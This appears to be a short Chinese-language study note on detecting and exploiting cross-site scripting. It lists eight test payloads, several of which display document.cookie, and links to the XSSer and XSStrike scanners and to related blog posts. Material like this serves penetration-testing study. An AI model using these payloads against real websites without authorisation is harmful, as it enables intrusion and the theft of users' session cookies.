章节7:XSS检测和利用
测试payload
<script>alert('XSS')</script>
<script>alert(document.cookie)</script>
><script>alert(document.cookie)</script>
='><script>alert(document.cookie)</script>
"><script>alert(document.cookie)</script>
%3Cscript%3Ealert('XSS')%3C/script%3E
<img src="javascript:alert('XSS')">
onerror= "alert('XSS')">
https://blog.csdn.net/weixin_34038652/article/details/90221170
XSSER
https://xsser.03c8.net/
https://www.freebuf.com/sectool/173228.html
https://blog.csdn.net/gao646467783/article/details/113249158
XSSSTRIKE
https://github.com/s0md3v/XSStrike
python 3.6 以上